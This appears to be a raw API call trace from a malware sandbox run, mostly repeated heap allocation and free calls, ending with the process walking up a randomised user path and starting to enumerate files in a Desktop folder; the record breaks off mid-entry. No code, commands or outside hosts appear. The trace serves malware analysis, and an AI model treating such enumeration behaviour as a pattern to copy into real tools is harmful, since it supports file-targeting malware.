[0200.876] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.876] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.876] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.877] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.877] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.877] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.877] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.877] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.877] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.877] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.877] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.878] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.878] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.878] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.878] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.878] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.878] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.878] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.878] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0200.879] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.879] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0200.879] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.879] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.879] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.879] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.880] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.880] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.880] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.880] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e8e298 [0200.880] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.880] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0200.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.881] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.881] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0200.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0200.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0200.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0200.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0200.886] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.886] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0200.887] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.887] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.889] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.889] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.891] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.891] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.891] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.892] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.892] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.892] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.892] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.892] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.893] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.893] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.893] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0200.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0200.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.894] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.894] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.894] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.895] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0200.895] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.895] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.895] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.895] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0200.896] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.896] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.896] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.896] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.896] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.897] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.897] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.897] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0200.898] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.898] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0200.898] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.898] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.898] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0200.899] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.899] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.899] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.899] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0200.899] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.899] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.900] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.900] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.900] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.900] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.900] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.900] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.901] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.901] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.901] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.901] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.901] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.902] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.902] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.902] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.902] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.902] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.902] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.902] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.903] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.903] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.903] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0200.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0200.906] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.906] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.906] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.907] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.907] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0200.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.907] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.907] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0200.908] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.908] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.909] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.909] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.910] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.911] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.911] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.911] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.911] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.911] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0200.912] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.912] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0200.912] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0200.913] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.913] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.913] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.913] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.913] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.914] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.914] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.914] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.917] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.917] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\YUyI2uqRriEqQVB sFMm\\") returned="YUyI2uqRriEqQVB sFMm\\" [0200.917] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0200.917] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4998 [0200.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.917] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\") returned="sj76aMesI3jmtOuE2hz\\" [0200.917] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8fb70 [0200.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4998 | out: hHeap=0x620000) returned 1 [0200.918] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\") returned="Desktop\\" [0200.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0200.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8fb70 | out: hHeap=0x620000) returned 1 [0200.918] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0200.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0200.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0200.918] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0200.919] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0200.919] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0200.919] PathFindFileNameW (pszPath="") returned="" [0200.919] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0200.919] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\YUyI2uqRriEqQVB sFMm\\*" (normalized: "c:\\users\\keecfmwgj\\desktop\\sj76amesi3jmtoue2hz\\yuyi2uqrrieqqvb sfmm\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xde474710, ftCreationTime.dwHighDateTime=0x1d8a256, ftLastAccessTime.dwLowDateTime=0xc3454f10, ftLastAccessTime.dwHighDateTime=0x1d8a630, ftLastWriteTime.dwLowDateTime=0xc3454f10, ftLastWriteTime.dwHighDateTime=0x1d8a630, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0200.920] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0200.920] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xde474710, ftCreationTime.dwHighDateTime=0x1d8a256, ftLastAccessTime.dwLowDateTime=0xc3454f10, ftLastAccessTime.dwHighDateTime=0x1d8a630, ftLastWriteTime.dwLowDateTime=0xc3454f10, ftLastWriteTime.dwHighDateTime=0x1d8a630, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0200.920] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cf46c50, ftCreationTime.dwHighDateTime=0x1d8a2a0, ftLastAccessTime.dwLowDateTime=0x42b2be80, ftLastAccessTime.dwHighDateTime=0x1d8a565, ftLastWriteTime.dwLowDateTime=0x42b2be80, 